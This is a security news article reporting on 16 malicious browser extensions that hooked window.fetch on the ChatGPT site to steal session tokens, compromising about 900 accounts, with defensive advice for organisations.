The promise of enhancing a user’s digital experience with convenient, feature-rich browser extensions has been dangerously subverted by threat actors who are now targeting the burgeoning field of artificial intelligence platforms. Recent security findings have brought to light a significant campaign involving 16 malicious browser extensions, meticulously designed to steal session authentication tokens from ChatGPT users, effectively handing over complete account control to attackers. These deceptive add-ons were discovered lurking in plain sight, with fifteen available on the Chrome Web Store and one on the Microsoft Edge Add-ons marketplace. At the time of their discovery, the extensions had already compromised the accounts of approximately 900 users, demonstrating a potent and active threat to anyone using the popular AI service. This incident underscores a critical vulnerability not within the AI platform itself, but in the third-party ecosystem that surrounds it, preying on users’ trust in tools advertised to improve their productivity.
The Anatomy of the Attack
The method employed by these malicious extensions, often deceptively marketed as “ChatGPT mods,” is a clever abuse of browser extension permissions rather than an exploit of a specific vulnerability within ChatGPT’s infrastructure. Once a user installs one of these add-ons, it injects a content script directly into the JavaScript environment of the ChatGPT webpage. This script’s primary function is to intercept all outbound network requests initiated by the user’s browser. It achieves this by “hooking” the window.fetch function, a standard web API used for fetching resources. The malicious code continuously monitors all network traffic for any request that includes an authorization header, which is the key component that authenticates a user’s session. Upon detecting such a header, the script immediately extracts the user’s unique session token and transmits it to a remote, attacker-controlled server. This entire process happens silently in the background, giving the user no indication that their credentials have just been compromised.
Broader Implications and Persistent Threats
The consequences of a stolen session token were far-reaching, granting an attacker the ability to completely impersonate the legitimate user. This provided unrestricted access to the user’s account, including their entire conversation history, which could contain sensitive personal or corporate information. The risk extended beyond the AI platform itself, potentially exposing any third-party applications connected to the ChatGPT account, such as Google Drive, Slack, or GitHub. Alarmingly, one of the malicious extensions, named “ChatGPT folder, voice download, prompt manager, free tools – ChatGPT Mods,” had even earned a “Featured” badge in the Chrome Web Store, suggesting it had successfully bypassed a review process designed to recommend safe and useful tools. This incident was part of a broader, more troubling trend of attackers leveraging browser extensions as a primary vector for stealing sensitive data. Similar attacks have targeted authenticated sessions for enterprise platforms like Workday and NetSuite, while another “Featured” extension was found exfiltrating conversations from multiple AI platforms, including Google Gemini and Microsoft Copilot. These cases demonstrated that organizations needed to treat any extension integrating with authenticated AI platforms as a high-risk vector and implement behavior-based monitoring solutions to detect such suspicious activities.






